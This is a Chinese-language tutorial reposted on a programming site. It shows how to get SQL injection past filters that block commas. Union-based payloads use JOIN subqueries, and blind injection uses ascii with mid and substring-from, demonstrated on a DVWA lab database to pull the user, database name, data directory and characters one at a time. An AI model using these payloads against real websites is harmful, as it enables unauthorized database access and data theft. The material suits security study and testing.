好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

SQL注入技巧之显注与盲注中过滤逗号绕过详析

前言

sql注入在很早很早以前是很常见的一个漏洞。后来随着安全水平的提高,sql注入已经很少能够看到了。但是就在今天,还有很多网站带着sql注入漏洞在运行。下面这篇文章主要介绍了关于SQL注入逗号绕过的相关内容,分享出来供大家参考学习,下面话不多说了,来一起看看详细的介绍吧

1.联合查询显注绕过逗号

在联合查询时使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,语句中包含了多个逗号,如果有WAF拦截了逗号时,我们的联合查询不能用了。

绕过

在显示位上替换为常见的注入变量或其它语句

?

1

2

3

4

5

union select 1,2,3;

 

union select * from (( select 1)A join ( select 2)B join ( select 3)C);

 

union select * from (( select 1)A join ( select 2)B join ( select group_concat( user (), ' ' , database (), ' ' ,@@datadir))C);

在数据库中演示联合查询

UNION开始是我们在URL中注入的语句,这里只是演示,在实际中如果我们在注入语句中有逗号就可能被拦截

?

1

2

3

4

5

6

7

8

mysql> select user_id, user , password from users union select 1,2,3;

+ ---------+-------+----------------------------------+

| user_id | user | password   |

+ ---------+-------+----------------------------------+

| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |

| 1 | 2 | 3  |

+ ---------+-------+----------------------------------+

2 rows in set (0.04 sec)

不出现逗号,使用Join来注入

?

1

2

3

4

5

6

7

8

mysql> select user_id, user , password from users union select * from (( select 1)A join ( select 2)B join ( select 3)C);

+ ---------+-------+----------------------------------+

| user_id | user | password   |

+ ---------+-------+----------------------------------+

| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |

| 1 | 2 | 3  |

+ ---------+-------+----------------------------------+

2 rows in set (0.05 sec)

查询我们想要的数据

?

1

2

3

4

5

6

7

8

mysql> select user_id, user , password from users union select * from (( select 1)A join ( select 2)B join ( select group_concat( user (), ' ' , database (), ' ' ,@@datadir))C);;

+ ---------+-------+-------------------------------------------------+

| user_id | user | password    |

+ ---------+-------+-------------------------------------------------+

| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |

| 1 | 2 | root@192.168.228.1 dvwa c:\phpStudy\MySQL\data\ |

+ ---------+-------+-------------------------------------------------+

2 rows in set (0.08 sec)

2.盲注中逗号绕过

MID 和substr 函数用于从文本字段中提取字符

?

1

2

3

4

5

6

7

mysql> select mid( user (),1,2);

+ -----------------+

| mid( user (),1,2) |

+ -----------------+

| ro |

+ -----------------+

1 row in set (0.04 sec)

查询数据库用户名第一个字符的ascii码

?

1

2

3

4

5

6

7

8

mysql> select user_id, user , password from users union select ascii(mid( user (),1,2)),2,3;

+ ---------+-------+----------------------------------+

| user_id | user | password   |

+ ---------+-------+----------------------------------+

| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |

| 114 | 2 | 3  |

+ ---------+-------+----------------------------------+

2 rows in set (0.05 sec)

盲注,通过猜ascii值

?

1

2

3

4

5

6

7

8

9

10

mysql> select user_id, user , password from users where user_id=1 and ( select ascii(mid( user (),1,2))=115) ;

Empty set

 

mysql> select user_id, user , password from users where user_id=1 and ( select ascii(mid( user (),1,2))=114) ;

+ ---------+-------+----------------------------------+

| user_id | user | password   |

+ ---------+-------+----------------------------------+

| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |

+ ---------+-------+----------------------------------+

1 row in set (0.04 sec)

逗号绕过SUBTTRING 函数

substring(str FROM pos)

从字符串str的起始位置pos 返回一个子串

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

mysql> select substring ( 'hello' from 1);

+ ---------------------------+

| substring ( 'hello' from 1) |

+ ---------------------------+

| hello  |

+ ---------------------------+

1 row in set (0.04 sec)

 

mysql> select substring ( 'hello' from 2);

+ ---------------------------+

| substring ( 'hello' from 2) |

+ ---------------------------+

| ello  |

+ ---------------------------+

1 row in set (0.03 sec)

注入

?

1

2

3

4

5

6

7

8

9

10

11

mysql> select user_id, user , password from users where user_id=1 and (ascii( substring ( user () from 2))=114) ;

Empty set

// substring ( user () from 2)为o

//o的ascii为111,

mysql> select user_id, user , password from users where user_id=1 and (ascii( substring ( user () from 2))=111) ;

+ ---------+-------+----------------------------------+

| user_id | user | password   |

+ ---------+-------+----------------------------------+

| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |

+ ---------+-------+----------------------------------+

1 row in set (0.03 sec)

总结

以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,如果有疑问大家可以留言交流,谢谢大家对服务器之家的支持。

原文链接:http://HdhCmsTestcnblogs测试数据/hackxf/p/9490534.html

查看更多关于SQL注入技巧之显注与盲注中过滤逗号绕过详析的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did231652
  阅读:45次

上一篇: 详解数据库中跨库数据表的运算

下一篇:SQL中过滤条件放on和where中的区别详解